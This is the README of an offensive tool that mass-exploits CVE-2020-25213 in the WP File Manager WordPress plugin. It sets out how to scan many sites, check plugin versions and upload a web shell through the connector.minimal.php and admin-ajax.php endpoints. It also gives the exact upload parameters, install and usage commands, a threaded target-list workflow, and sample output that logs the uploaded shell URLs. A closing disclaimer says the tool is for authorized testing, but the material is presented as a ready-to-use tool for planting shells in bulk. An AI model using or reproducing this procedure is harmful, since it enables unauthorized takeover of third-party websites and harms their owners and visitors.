██╗ ██╗██████╗ ███████╗██╗██╗ ███████╗███╗ ███╗ █████╗ ███╗ ██╗ █████╗ ██████╗ ███████╗██████╗
██║ ██║██╔══██╗ ██╔════╝██║██║ ██╔════╝████╗ ████║██╔══██╗████╗ ██║██╔══██╗██╔════╝ ██╔════╝██╔══██╗
██║ █╗ ██║██████╔╝█████╗█████╗ ██║██║ █████╗ ██╔████╔██║███████║██╔██╗ ██║███████║██║ ███╗█████╗ ██████╔╝
██║███╗██║██╔═══╝ ╚════╝██╔══╝ ██║██║ ██╔══╝ ██║╚██╔╝██║██╔══██║██║╚██╗██║██╔══██║██║ ██║██╔══╝ ██╔══██╗
╚███╔███╔╝██║ ██║ ██║███████╗███████╗██║ ╚═╝ ██║██║ ██║██║ ╚████║██║ ██║╚██████╔╝███████╗██║ ██║
╚══╝╚══╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝
WP File Manager — Mass Exploit + UnknownSec Shell Upload
- 🔥 Overview
- 🎯 Vulnerability
- ✨ Features
- 📦 Installation
- 🚀 Usage
- 📂 Project Structure
- 🛠️ How It Works
- 📊 Output Format
- 🎨 Color Scheme
⚠️ Disclaimer- 📡 Connect
WP File Manager Auto Upload Shell is a mass exploitation tool that detects and exploits CVE-2020-25213 — an unauthenticated arbitrary file upload vulnerability in the WP File Manager WordPress plugin (versions ≤ 6.8), leading to Remote Code Execution via the connector.minimal.php endpoint.
The tool scans a list of WordPress targets, fingerprints the plugin version, and drops an UnknownSec File Manager shell if the target is vulnerable.
| 🔴 CVE | 📦 Plugin | ⚡ Type | 💯 CVSS | 🎯 Impact |
|---|---|---|---|---|
| CVE-2020-25213 | WP File Manager ≤ 6.8 | Arbitrary File Upload | Unauthenticated RCE |
The vulnerability resides in the elFinder connector bundled with the plugin:
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
The endpoint accepts file uploads without authentication when the plugin ships with the default connector.minimal.php configuration. The cmd=upload parameter combined with the upload[] multipart field writes arbitrary PHP files to lib/files/.
|
|
|
|
Python 3.8+
pip (Python package manager)# Clone the repository
git clone https://github.com/HackfutSecRoot/wordpress-auto-upload-shell.git
cd wordpress-auto-upload-shell
# Install dependencies
pip install -r requirements.txtrequests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6file.php (UnknownSec shell) in the same directory as the script.
wordpress-auto-upload-shell/
├── wpfm_exploit.py ← the script
├── file.php ← ⚠️ YOUR SHELL HERE
└── targets.txt
If file.php is missing, a minimal fallback is auto-generated.
python wpfm_exploit.py -l targets.txt -t 60python wpfm_exploit.py -u http://target.compython wpfm_exploit.py -u http://target.com -v| Argument | Description | Default |
|---|---|---|
-u, --url |
Single target URL | — |
-l, --list |
File with targets (one per line) | — |
-t, --threads |
Number of concurrent threads | 60 |
--timeout |
Per-request timeout (seconds) | 15 |
-o, --output |
Output directory | ./wpfm_RESULTS |
-v, --verbose |
Verbose output | False |
http://target1.com
https://target2.com
target3.com
# comment (ignored)
wordpress-auto-upload-shell/
│
├── 📄 README.md # This file
├── 📄 requirements.txt # Python dependencies
├── 📄 LICENSE # MIT License
│
├── 🔴 wpfm_exploit.py # Main exploit script
├── 💀 file.php # UnknownSec shell (next to script)
├── 📄 targets.txt # Target list
│
└── 📁 wpfm_RESULTS/ # Auto-generated
└── shells.txt # Uploaded shell URLs
graph TD
A[Start] --> B{Fingerprint WordPress}
B -->|No| Z[Skip: not WordPress]
B -->|Yes| C{Read readme.txt}
C -->|Not found| D[Probe connector.minimal.php]
D -->|404| Z2[Skip: FM not installed]
D -->|200/400/403| E[Assume vulnerable]
C -->|Found| F{Version < 7.0?}
F -->|No| Z3[Skip: patched]
F -->|Yes| E
E --> G[POST connector.minimal.php]
G --> H[Upload file.php]
H --> I{Marker found?}
I -->|No| J[Try admin-ajax.php]
J --> I
I -->|Yes| K[Save shell URL to shells.txt]
K --> L[Log: Shell Uploaded Successfully]
-
WordPress Detection
- Scans homepage for
wp-content/,wp-includes/,wp-json - Probes
/wp-login.php,/wp-admin/,/wp-json/,/xmlrpc.php
- Scans homepage for
-
WP File Manager Detection
- Reads
/wp-content/plugins/wp-file-manager/readme.txt - Extracts
Stable tag: X.Y - Falls back to probing
connector.minimal.phpif readme absent
- Reads
-
Version Check
- Parses version as float
- Rejects
>= 7.0(patched)
-
Shell Upload
- Vector 1: POST to
connector.minimal.phpwithcmd=upload&upload[]=@file.php - Vector 2: POST to
admin-ajax.phpwithaction=mk_file_folder_manager
- Vector 1: POST to
-
Verification
- GET on 5 candidate paths
- Checks for marker:
UnknownSec Shell/shell bypass 403/mass deface - Only counts as success if marker found
[14:32:15] - http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php - [Shell Uploaded Successfully]
[14:32:16] - http://target2.com - [Upload Failed]
[14:32:17] - http://target3.com - [FileManager Not Installed]
[14:32:18] - http://target4.com - [Not vuln]
http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php
http://target2.com/wp-content/uploads/shell_xyz789.php
======================================================================
FINAL SUMMARY
======================================================================
Total targets : 150
Shells uploaded : 12
Failed : 138
Errors : 0
Duration : 45.23s
Shells saved to : ./wpfm_RESULTS/shells.txt
VULNERABLE TARGETS:
[+] http://target.com (v6.8) -> http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php
[+] http://target2.com (v6.5) -> http://target2.com/wp-content/plugins/wp-file-manager/lib/files/shell_xyz789.php
| Color | ANSI Code | Usage |
|---|---|---|
| 🟢 Green Bold | \033[1;32m |
Shell Uploaded Successfully |
| 🔴 Red Bold | \033[1;31m |
Upload Failed, Not vuln, FileManager Not Installed |
| 🟡 Light Yellow Bold | \033[1;33m |
Timestamp [14:32:15] |
| ⚪ Light White Bold | \033[1;37m |
Target URLs and paths |
$ python wpfm_exploit.py -l targets.txt -t 60
██╗ ██╗██████╗ ███████╗██╗██╗ ███████╗███╗ ███╗ █████╗ ███╗ ██╗ █████╗ ██████╗ ███████╗██████╗
...banner...
◆ This Tool is Designed to identify vulnerabilities in WordPress installations.
◆ Specifically targeting the WP File Manager plugin (CVE-2020-25213 and others).
◆ It checks for known vulnerabilities and attempts to upload a shell if a vulnerable version is detected.
[14:32:15] - Targets: 150 | Threads: 60 | Timeout: 15s
[14:32:16] - http://target1.com/wp-content/plugins/wp-file-manager/lib/files/shell_abc123.php - [Shell Uploaded Successfully]
[14:32:17] - http://target2.com - [FileManager Not Installed]
[14:32:18] - http://target3.com - [Not vuln]
[14:32:19] - http://target4.com - [Upload Failed]╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ☠️ FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY ☠️ ║
║ ║
║ • All tools are provided AS-IS for LAB use ║
║ • Use ONLY on systems you own or have WRITTEN permission ║
║ • Unauthorized access is ILLEGAL and punishable by law ║
║ • The author is NOT responsible for any misuse ║
║ ║
║ "With great power comes great responsibility." ║
║ ║
╚══════════════════════════════════════════════════════════════════╝
Distributed under the MIT License. See LICENSE for more information.